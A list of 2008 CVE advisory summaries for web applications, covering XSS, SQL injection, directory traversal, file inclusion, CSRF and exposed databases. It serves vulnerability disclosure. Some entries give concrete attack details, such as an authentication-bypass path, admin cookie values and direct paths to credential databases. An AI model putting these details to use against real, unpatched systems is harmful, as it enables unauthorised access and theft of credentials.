[CVE-2008-6757] Cross-site scripting (XSS) vulnerability in manuals_search.php in ViArt Shop (aka Shopping Cart) 3.5 allows remote attackers to inject arbitrary web script or HTML via the manuals_search parameter. [CVE-2008-6746] Cross-site scripting (XSS) vulnerability in the contact display view in Turba Contact Manager H3 before 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the contact name. [CVE-2008-6734] Directory traversal vulnerability in Public/index.php in Keller Web Admin CMS 0.94 Pro allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the action parameter. [CVE-2008-6733] Cross-site scripting (XSS) vulnerability in the error handling page in DotNetNuke 4.6.2 through 4.8.3 allows remote attackers to inject arbitrary web script or HTML via the querystring parameter. [CVE-2008-6732] Cross-site scripting (XSS) vulnerability in the Language skin object in DotNetNuke before 4.8.4 allows remote attackers to inject arbitrary web script or HTML via "newly generated paths." [CVE-2008-6727] Cross-site scripting (XSS) vulnerability in Ultimate PHP Board (UPB) 2.2.2, 2.2.1, and earlier 2.x versions allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2008-6724] Cross-site scripting (XSS) vulnerability in index.pl in Perl Nopaste 1.0 allows remote attackers to inject arbitrary web script or HTML via the language parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache. [CVE-2008-6715] Multiple cross-site scripting (XSS) vulnerabilities in Pre ADS Portal 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) homeadmin/adminhome.php and (2) homeadmin/signinform.php. [CVE-2008-6700] Multiple cross-site scripting (XSS) vulnerabilities in Butterfly Organizer 2.0.0 allow remote attackers to inject arbitrary web script or HTML via the (1) mytable parameter to view.php, (2) mytable parameter to viewdb2.php, (3) tablehere parameter to category-rename.php, and (4) letter parameter to module-contacts.php. [CVE-2008-6699] Cross-site scripting (XSS) vulnerability in Resource Library (tjs_reslib) 0.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-6698] Cross-site scripting (XSS) vulnerability in TARGET-E WorldCup Bets (worldcup) 2.0.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-6688] Cross-site scripting (XSS) vulnerability in JobControl (dmmjobcontrol) 1.15.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-6687] Cross-site scripting (XSS) vulnerability in DCD GoogleMap (dcdgooglemap) 1.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-6683] Cross-site scripting (XSS) vulnerability in listtest.php in Apartment Search Script allows remote attackers to inject arbitrary web script or HTML via the r parameter. [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag. [CVE-2008-6681] Cross-site scripting (XSS) vulnerability in dijit.Editor in Dojo before 1.1 allows remote attackers to inject arbitrary web script or HTML via XML entities in a TEXTAREA element. [CVE-2008-6675] Multiple cross-site scripting (XSS) vulnerabilities in QuickerSite 1.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the close parameter to showThumb.aspx [CVE-2008-6669] viewrq.php in nweb2fax 0.2.7 and earlier allows remote attackers to execute arbitrary code via shell metacharacters in the var_filename parameter in a (1) tif or (2) pdf format action. [CVE-2008-6668] Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) id parameter to comm.php and (2) var_filename parameter to viewrq.php. [CVE-2008-6666] Multiple cross-site scripting (XSS) vulnerabilities in Kronos webTA allow remote attackers to inject arbitrary web script or HTML via the description field to (1) servlet/com.threeis.webta.H710selProject and (2) servlet/com.threeis.webta.H720editProjectInfo. NOTE: BID:29610 states that the initial report was incorrect, but the reason for this conclusion is unknown. [CVE-2008-6655] Multiple cross-site scripting (XSS) vulnerabilities in GEDCOM_TO_MYSQL 2 allow remote attackers to inject arbitrary web script or HTML via the (1) nom_branche and (2) nom parameters to php/prenom.php [CVE-2008-6654] Cross-site scripting (XSS) vulnerability in search_results.php in InfoBiz Server allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2008-6653] SQL injection vulnerability in webhosting.php in the Webhosting Component (com_webhosting) module before 1.1 RC7 for Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the catid parameter to index.php. [CVE-2008-6646] Cross-site scripting (XSS) vulnerability in index.php in CoronaMatrix phpAddressBook 2.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2008-6645] Cross-site scripting (XSS) vulnerability in Opencosmo VisualSentinel 0.7 allows remote attackers to inject arbitrary web script or HTML via the User-Agent header ($_SERVER ['HTTP_USER_AGENT']), which is not properly handled when displaying log files. [CVE-2008-6644] Cross-site scripting (XSS) vulnerability in Default.aspx in DotNetNuke 4.8.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2008-6637] Multiple cross-site scripting (XSS) vulnerabilities in forgotPW.php in Library Video Company SAFARI Montage 3.1.x allow remote attackers to inject arbitrary web script or HTML via the (1) school and (2) email parameters. [CVE-2008-6631] Multiple cross-site scripting (XSS) vulnerabilities in index.php in BlogPHP 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) user parameter in a sendmessage action and the (2) username parameter when registering a new user, different vectors than CVE-2008-0679. [CVE-2008-6629] Cross-site scripting (XSS) vulnerability in detail.php in WEBBDOMAIN Multi Languages WebShop Online 1.02 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2008-6627] SQL injection vulnerability in getin.php in WEBBDOMAIN WebShop 1.2, 1.1, 1.02, and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2008-6626] SQL injection vulnerability in getin.php in WEBBDOMAIN Quiz 1.02 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2008-6625] SQL injection vulnerability in getin.php in WEBBDOMAIN Polls (aka Poll) 1.0 and 1.01 allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2008-6624] SQL injection vulnerability in getin.php in WEBBDOMAIN Petition 1.02, 2.0, and 3.0 allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2008-6623] SQL injection vulnerability in getin.php in WEBBDOMAIN Post Card (aka Web Postcards) 1.02 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2008-6622] SQL injection vulnerability in choosecard.php in WEBBDOMAIN Post Card (aka Web Postcards) 1.02, 1.01, and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2008-6620] Multiple cross-site scripting (XSS) vulnerabilities in javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php in GraFX miniCWB 2.1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) errcontext, (2) _GET, (3) _POST, (4) _SESSION, (5) _SERVER, and (6) fckphp_config[Debug_SERVER] parameters. [CVE-2008-6616] Cross-site scripting (XSS) vulnerability in index.php in Zen Software Zen Cart 2008 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in the advanced_search_result page. NOTE: the provenance of this information is unknown [CVE-2008-6609] Cross-site scripting (XSS) vulnerability in phpcksec.php in Stefan Ott phpcksec 0.2 allows remote attackers to inject arbitrary web script or HTML via the path parameter. [CVE-2008-6607] Cross-site scripting (XSS) vulnerability in view.php in MatPo Link 1.2 Beta allows remote attackers to inject arbitrary web script or HTML via the thema parameter. [CVE-2008-6600] Cross-site scripting (XSS) vulnerability in the search feature in XMLPortal 3.0 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2008-6599] cookiecheck.php in CookieCheck 1.0 stores tmp/cc_sessions under the web root with insufficient access control, which allows remote attackers to obtain session data via a direct request related to the "default session save path." [CVE-2008-6597] Cross-site scripting (XSS) vulnerability in upload/install/index.php in PHCDownload 1.1 allows remote attackers to inject arbitrary web script or HTML via the step parameter. NOTE: the provenance of this information is unknown [CVE-2008-6589] Multiple cross-site scripting (XSS) vulnerabilities in LightNEasy "no database" (aka flat) version 1.2.2, and possibly SQLite version 1.2.2, allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) index.php and (2) LightNEasy.php. [CVE-2008-6587] Cross-site request forgery (CSRF) vulnerability in index.tmpl in Vuze (formerly Azureus HTML WebUI), probably 0.7.6, allows remote attackers to hijack the authentication of users for requests that force the download of arbitrary torrent files via the upurl parameter. [CVE-2008-6586] Cross-site request forgery (CSRF) vulnerability in gui/index.php in \xC1Torrent (uTorrent) WebUI 0.315 allows remote attackers to (1) hijack the authentication of users for requests that force the download of arbitrary torrent files via the add-url action and (2) hijack the authentication of administrators for requests that modify the administrator account via the setsetting action. [CVE-2008-6582] SQL injection vulnerability in index.php in Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the username parameter in a login action. [CVE-2008-6580] The Red_Reservations script for ColdFusion stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database via a direct request to (1) makered.mdb and (2) makered97.mdb. [CVE-2008-6579] Nortel Communication Server 1000 4.50.x allows remote attackers to obtain Web application structure via unknown vectors related to "web resources to phones and administrators." [CVE-2008-6571] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.3.4 might allow remote attackers to inject arbitrary web script or HTML via (1) new_images.php, (2) login.php, and unspecified vectors. [CVE-2008-6570] Cross-site scripting (XSS) vulnerability in the RSS reader in Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to inject arbitrary web script or HTML via a crafted RSS feed. [CVE-2008-6569] Session fixation vulnerability in Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to hijack web sessions via the session ID in the login page. [CVE-2008-6567] Multiple cross-site scripting (XSS) vulnerabilities in Gallarific Free Edition allow remote attackers to inject arbitrary web script or HTML via (1) the e-mail address, (2) a comment, which is not properly handled during moderation, and (3) the tag parameter to gallery/tags.php. [CVE-2008-6565] Cross-site scripting (XSS) vulnerability in Invision Power Board 2.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via an IFRAME tag in the signature. [CVE-2008-6562] Cross-site scripting (XSS) vulnerability in jax_linklists.php in Jack (tR) Jax LinkLists 1.00 allows remote attackers to inject arbitrary web script or HTML via the cat parameter. NOTE: the provenance of this information is unknown [CVE-2008-6557] cgi-bin/webutil.pl in The Puppet Master WebUtil 2.7 allows remote attackers to execute arbitrary commands via shell metacharacters in the details command. [CVE-2008-6556] cgi-bin/webutil.pl in The Puppet Master WebUtil 2.3 allows remote attackers to execute arbitrary commands via shell metacharacters in the whois command. [CVE-2008-6555] cgi-bin/webutil.pl in The Puppet Master WebUtil allows remote attackers to execute arbitrary commands via shell metacharacters in the dig command. [CVE-2008-6550] Cross-site scripting (XSS) vulnerability in glossaire.php in Glossaire 2.0 allows remote attackers to inject arbitrary web script or HTML via the letter parameter. NOTE: the provenance of this information is unknown [CVE-2008-6545] PHP remote file inclusion vulnerability in news/include/createdb.php in Web Server Creator Web Portal 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the langfile parameter. NOTE: the provenance of this information is unknown [CVE-2008-6540] DotNetNuke before 4.8.2, during installation or upgrade, does not warn the administrator when the default (1) ValidationKey and (2) DecryptionKey values cannot be modified in the web.config file, which allows remote attackers to bypass intended access restrictions by using the default keys. [CVE-2008-6531] The WebWork 1 web application framework in Atlassian JIRA before 3.13.2 allows remote attackers to invoke exposed public JIRA methods via a crafted URL that is dynamically transformed into method calls, aka "WebWork 1 Parameter Injection Hole." [CVE-2008-6529] Cross-site scripting (XSS) vulnerability in listtest.php in eZoneScripts Living Local 1.1 allows remote attackers to inject arbitrary web script or HTML via the r parameter. [CVE-2008-6520] Multiple format string vulnerabilities in the SSI filter in Xitami Web Server 2.5c2, and possibly other versions, allow remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in a URI that ends in (1) .ssi, (2) .shtm, or (3) .shtml, which triggers incorrect logging code involving the sendfmt function in the SMT kernel. [CVE-2008-6519] Format string vulnerability in Xitami Web Server 2.2a through 2.5c2, and possibly other versions, allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in a Long Running Web Process (LRWP) request, which triggers incorrect logging code involving the sendfmt function in the SMT kernel. [CVE-2008-6515] Cross-site scripting (XSS) vulnerability in Fritz Berger yet another php photo album - next generation (yappa-ng) allows remote attackers to inject arbitrary web script or HTML via the query string to the default URI. [CVE-2008-6511] Open redirect vulnerability in login.jsp in Openfire 3.6.0a and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. [CVE-2008-6510] Cross-site scripting (XSS) vulnerability in login.jsp in the Admin Console in Openfire 3.6.0a and earlier allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2008-6508] Directory traversal vulnerability in the AuthCheck filter in the Admin Console in Openfire 3.6.0a and earlier allows remote attackers to bypass authentication and access the admin interface via a .. (dot dot) in a URI that matches the Exclude-Strings list, as demonstrated by a /setup/setup-/.. sequence in a URI. [CVE-2008-6503] Multiple cross-site scripting (XSS) vulnerabilities in PrestaShop 1.1.0.3 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin/login.php and (2) order.php. [CVE-2008-6501] Cross-site scripting (XSS) vulnerability in profiles/index.php in Pro Chat Rooms 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the gud parameter. [CVE-2008-6500] Cross-site scripting (XSS) vulnerability in CodeToad ASP Shopping Cart Script allows remote attackers to inject arbitrary web script or HTML via the query string to the default URI. [CVE-2008-6495] Cross-site scripting (XSS) vulnerability in index.php in Fritz Berger yet another php photo album - next generation (yappa-ng) 2.3.2 allows remote attackers to inject arbitrary web script or HTML via the album parameter. [CVE-2008-6494] ASP User Engine.NET stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for users.mdb. [CVE-2008-6493] Easy Content Management Publishing stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for Database/News.mdb. [CVE-2008-6476] Cross-site scripting (XSS) vulnerability in blog/search.aspx in BlogEngine.NET allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2008-6474] The management interface in F5 BIG-IP 9.4.3 allows remote authenticated users with Resource Manager privileges to inject arbitrary Perl code via unspecified configuration settings related to Perl EP3 with templates, probably triggering static code injection. [CVE-2008-6465] Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters. [CVE-2008-6455] Session fixation vulnerability in Edikon phpShop 0.8.1 allows remote attackers to hijack web sessions via unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2008-6450] Cross-site scripting (XSS) vulnerability in Under Construction, Baby (UCB) PC2M 0.9.22.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-6448] Cross-site scripting (XSS) vulnerability in install.cgi in SKYARC System MTCMS WYSIWYG Editor allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6439] Cross-site scripting (XSS) vulnerability in search_results.php in ABK-Soft AbleDating 2.4 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2008-6437] Multiple cross-site scripting (XSS) vulnerabilities in PHPFreeForum 1.0 RC2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) message parameter to error.php, and the (2) nickname and (3) randomid parameters to part/menu.php. [CVE-2008-6436] Cross-site scripting (XSS) vulnerability in the Web Server in Xerox WorkCentre 7132, 7228, 7235, and 7245 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6435] Multiple cross-site scripting (XSS) vulnerabilities in phpSQLiteCMS 1 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) lang[home], (2) lang[admin_menu], and (3) lang[admin_menu_page_overview] parameters to cms/includes/header.inc.php [CVE-2008-6433] Cross-site scripting (XSS) vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action. [CVE-2008-6431] Multiple cross-site scripting (XSS) vulnerabilities in BMForum 5.6 allow remote attackers to inject arbitrary web script or HTML via the (1) outpused parameter to index.php, the (2) footer_copyright and (3) verandproname parameters to newtem/footer/bsd01footer.php, and the (4) topads and (5) myplugin parameters to newtem/header/bsd01header.php. [CVE-2008-6420] Social Site Generator (SSG) 2.0 allows remote attackers to read arbitrary files via the file parameter to (1) filedload.php, (2) webadmin/download.php, and (3) webadmin/download_file.php. [CVE-2008-6416] Multiple cross-site scripting (XSS) vulnerabilities in GreenSQL-Console before 0.3.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "internal pages." [CVE-2008-6413] Cross-site scripting (XSS) vulnerability in the Answers module 5.x-1.x-dev and possibly other 5.x versions, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a Simple Answer to a question. [CVE-2008-6406] Cross-site scripting (XSS) vulnerability in admin.php in DataLife Engine (DLE) 7.2 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2008-6404] Cross-site scripting (XSS) vulnerability in add_calendars.php in eXtrovert Software Thyme 1.3 allows remote attackers to inject arbitrary web script or HTML via the callback parameter. [CVE-2008-6402] PHP remote file inclusion vulnerability in hu/modules/reg-new/modstart.php in Sofi WebGui 0.6.3 PRE and earlier allows remote attackers to execute arbitrary PHP code via a URL in the mod_dir parameter. [CVE-2008-6401] SQL injection vulnerability in sayfa.php in JETIK-WEB allows remote attackers to execute arbitrary SQL commands via the kat parameter. [CVE-2008-6400] Cross-site scripting (XSS) vulnerability in refbase before 0.9.5 allows remote attackers to inject arbitrary web script or HTML via the headerMsg parameter to (1) show.php and (2) search.php. NOTE: some of these details are obtained from third party information. [CVE-2008-6396] Cross-site scripting (XSS) vulnerability in account.php in Celerondude Uploader 6.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-6388] Rapid Classified 3.1 and 3.15 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to cldb.mdb. [CVE-2008-6387] Quick Tree View .NET 3.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to qtv.mdb. [CVE-2008-6386] Cross-site scripting (XSS) vulnerability in showads.php in Z1Exchange 1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2008-6385] Cross-site scripting (XSS) vulnerability in index.php in W3matter RevSense 1.0 allows remote attackers to inject arbitrary web script or HTML via the section parameter. [CVE-2008-6382] ASP Portal 3.2.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to ASPPortal.mdb. [CVE-2008-6380] SQL injection vulnerability in default.aspx in Active Web Helpdesk 2.0 allows remote attackers to execute arbitrary SQL commands via the CategoryID parameter. [CVE-2008-6375] JBook stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to userids.mdb. [CVE-2008-6374] CodefixerSoftware MailingListPro Free Edition stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to db/MailingList.mdb. [CVE-2008-6370] Cross-site scripting (XSS) vulnerability in default.asp in Ocean12 Contact Manager Pro 1.02 allows remote attackers to inject arbitrary web script or HTML via the DisplayFormat parameter. [CVE-2008-6360] Cross-site scripting (XSS) vulnerability in the userranks feature in modules/system/admin.php in ImpressCMS 1.0.2 final allows remote attackers to inject arbitrary web script or HTML via the rank_title parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-6359] Cross-site scripting (XSS) vulnerability in index.php in Max's Guestbook allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, and (3) message parameters. [CVE-2008-6357] MyCal Personal Events Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to mycal.mdb. [CVE-2008-6356] evCal Events Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to (1) evcal.mdb and (2) evcal97.mdb. [CVE-2008-6355] The Net Guys ASPired2Protect stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to ASPired2Protect.mdb. [CVE-2008-6354] The Net Guys ASPired2poll stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request to ASPired2poll.mdb. [CVE-2008-6351] Cross-site scripting (XSS) vulnerability in listtest.php in TurnkeyForms Local Classifieds allows remote attackers to inject arbitrary web script or HTML via the r parameter. [CVE-2008-6346] Cross-site scripting (XSS) vulnerability in the DR Wiki (dr_wiki) extension 1.7.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6343] Cross-site scripting (XSS) vulnerability in the TU-Clausthal ODIN (tuc_odin) extension 0.0.1, 0.1.0, 0.1.1, and 0.2.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6341] Cross-site scripting (XSS) vulnerability in the SB Universal Plugin (SBuniplug) extension 2.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6340] Cross-site scripting (XSS) vulnerability in the Vox populi (mv_vox_populi) extension 0.3.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6338] SQL injection vulnerability in the WEBERkommunal Facilities (wes_facilities) extension 2.0 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2008-6334] Directory traversal vulnerability in download.php in eMetrix Extract Website allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter. [CVE-2008-6325] Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Classifieds Script allow remote attackers to inject arbitrary web script or HTML via the (1) radio parameter to showcategory.php, (2) msg parameter to advertisers/signinform.php, (3) radio parameter to gallery.php, (4) msg parameter to lostpassword.php, (5) radio parameter to showcategory.php, (6) msg parameter to admin/adminhome.php, and (7) msg parameter to admin/index.php. NOTE: a different signinform.php file is already covered by CVE-2008-6306. [CVE-2008-6321] CF Shopkart 5.2.2 stores cfshopkart52.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information, such as usernames and passwords, via a direct request. [CVE-2008-6306] Cross-site scripting (XSS) vulnerability in signinform.php in Softbiz Classifieds Script allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the provenance of this information is unknown [CVE-2008-6300] Galatolo WebManager 1.3a allows remote attackers to bypass authentication and gain administrative access by setting the (1) gwm_user and (2) gwm_pass cookies to admin. NOTE: the provenance of this information is unknown [CVE-2008-6299] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! 1.5.7 and earlier allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) the title and description parameters to the com_weblinks module and (2) unspecified vectors in the com_content module related to "article submission." [CVE-2008-6297] Cross-site scripting (XSS) vulnerability in order.php in DHCart allows remote attackers to inject arbitrary web script or HTML via the (1) domain and (2) d1 parameters. [CVE-2008-6295] Multiple cross-site scripting (XSS) vulnerabilities in Camera Life 2.6.2b8 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.php and (2) rss.php [CVE-2008-6288] Directory traversal vulnerability in download.php in Interface Medien ibase 2.03 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter. [CVE-2008-6283] Cross-site scripting (XSS) vulnerability in Subtext 2.0 allows remote attackers to inject arbitrary web script or HTML via a comment, related to "the feature which converts URLs to anchor tags." [CVE-2008-6280] Cross-site scripting (XSS) vulnerability in apply.cgi on the Linksys WRT160N allows remote attackers to inject arbitrary web script or HTML via the action parameter in a DHCP_Static operation. [CVE-2008-6278] Multiple cross-site scripting (XSS) vulnerabilities in product.php in RakhiSoftware Price Comparison Script (aka Shopping Cart) allow remote attackers to inject arbitrary web script or HTML via the (1) category_id and (2) subcategory_id parameters. [CVE-2008-6275] Cross-site scripting (XSS) vulnerability in the User Karma module 5.x before 5.x-1.13 and 6.x before 6.x-1.0-beta1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified messages. [CVE-2008-6268] SQL injection vulnerability in detail.php in WEBBDOMAIN Multi Languages WebShop Online 1.02 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-6267] Cross-site scripting (XSS) vulnerability in detail.php in Multi Languages WebShop Online 1.02 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2008-6266] SQL injection vulnerability in links.php in Appalachian State University phpWebSite allows remote attackers to execute arbitrary SQL commands via the cid parameter in a viewlink action. [CVE-2008-6259] Cross-site scripting (XSS) vulnerability in search.asp in QuadComm Q-Shop 3.0, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the srkeys parameter. [CVE-2008-6250] SQL injection vulnerability in Comdev Web Blogger 4.1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the arcmonth parameter to a blog page. [CVE-2008-6249] SQL injection vulnerability in plugins/users/index.php in Galatolo WebManager 1.3a and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-6248] Cross-site scripting (XSS) vulnerability in all.php in Galatolo WebManager 1.3a and earlier allows remote attackers to inject arbitrary web script or HTML via the tag parameter. [CVE-2008-6246] SQL injection vulnerability in category.php in Scripts For Sites (SFS) EZ Webring allows remote attackers to execute arbitrary SQL commands via the cat parameter. [CVE-2008-6240] Cross-site scripting (XSS) vulnerability in data/views/index.html in OpenEdit Digital Asset Management (DAM) before 5.2014 allows remote attackers to inject arbitrary web script or HTML via the catalogid parameter. [CVE-2008-6238] Cross-site scripting (XSS) vulnerability in archive/savedqueries/savequeryfinish.html in OpenEdit Digital Asset Management (DAM) before 5.2014 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2008-6217] Cross-site scripting (XSS) vulnerability in index.php in Extrakt Framework 0.7 allows remote attackers to inject arbitrary web script or HTML via the plugins[file][id] parameter. NOTE: the provenance of this information is unknown [CVE-2008-6215] Cross-site scripting (XSS) vulnerability in cadena_ofertas_ext.php in Venalsur Booking Centre Booking System for Hotels Group allows remote attackers to inject arbitrary web script or HTML via the OfertaID parameter. [CVE-2008-6212] Cross-site scripting (XSS) vulnerability in admin.php in Php-Stats 0.1.9.1 allows remote attackers to inject arbitrary web script or HTML via the (1) sel_mese and (2) sel_anno parameters in a systems action. NOTE: the provenance of this information is unknown [CVE-2008-6211] Multiple cross-site scripting (XSS) vulnerabilities in PhpForums.net mcGallery 1.1 allow remote attackers to inject arbitrary web script or HTML via the lang parameter to (1) admin.php, (2) index.php, (3) sess.php, (4) stats.php, (5) detail.php, (6) resize.php, and (7) show.php. NOTE: the provenance of this information is unknown [CVE-2008-6208] Cross-site scripting (XSS) vulnerability in submitnews.php in e107 CMS 0.7.11 allows remote attackers to inject arbitrary web script or HTML via the (1) author_name, (2) itemtitle, and (3) item parameters. NOTE: the provenance of this information is unknown [CVE-2008-6205] Cross-site scripting (XSS) vulnerability in seeurl.php in Xavier Flahaut URLStreet 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) language, (2) order, and (3) filter parameters. NOTE: the provenance of this information is unknown [CVE-2008-6200] Multiple cross-site scripting (XSS) vulnerabilities in Swiki 1.5 allow remote attackers to inject arbitrary web script or HTML via (1) the query string and (2) a new wiki entry. [CVE-2008-6199] 2532designs 2532\|Gigs 1.2.2 and earlier allows remote attackers to trigger a backup and obtain sensitive information via a direct request to backup.php, which creates backup.sql under the web root with insufficient access control. [CVE-2008-6192] Multiple cross-site scripting (XSS) vulnerabilities in unspecified Portlets in Sun Java System Portal Server 7.0 and 7.1 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-6190] Cross-site scripting (XSS) vulnerability in index.php in EEBCMS 0.95 allows remote attackers to inject arbitrary web script or HTML via the content parameter. [CVE-2008-6174] Cross-site scripting (XSS) vulnerability in admin/postlister/index.php in Jetbox CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the liste parameter. [CVE-2008-6173] Cross-site scripting (XSS) vulnerability in fullscreen.php in ClipShare Pro 4.0 allows remote attackers to inject arbitrary web script or HTML via the title parameter. [CVE-2008-6170] Cross-site scripting (XSS) vulnerability in Drupal 5.x before 5.12 and 6.x before 6.6 allows remote authenticated users with create book content or edit node book hierarchy permissions to inject arbitrary web script or HTML via the book page title. [CVE-2008-6169] Cross-site request forgery (CSRF) vulnerability in the Localization client 5.x before 5.x-1.1 and 6.x before 6.x-1.6 and the Localization server 5.x before 5.x-1.0-alpha5 and 6.x before 6.x-alpha2, modules for Drupal, allows remote attackers to perform unauthorized actions as administrators via unspecified vectors related to the "local translation submission interface." [CVE-2008-6168] Cross-site scripting (XSS) vulnerability in search.php in miniPortail 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via an unspecified argument, probably the search string. [CVE-2008-6164] Cross-site scripting (XSS) vulnerability in index.php in DreamCost HostAdmin 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2008-6161] Cross-site scripting (XSS) vulnerability in WOW Raid Manager (WRM) before 3.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6153] SQL injection vulnerability in Photo.asp in Jay Patel Pixel8 Web Photo Album 3.0 allows remote attackers to execute arbitrary SQL commands via the AlbumID parameter. [CVE-2008-6147] ForumApp 3.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) data/8690.mdb or (2) 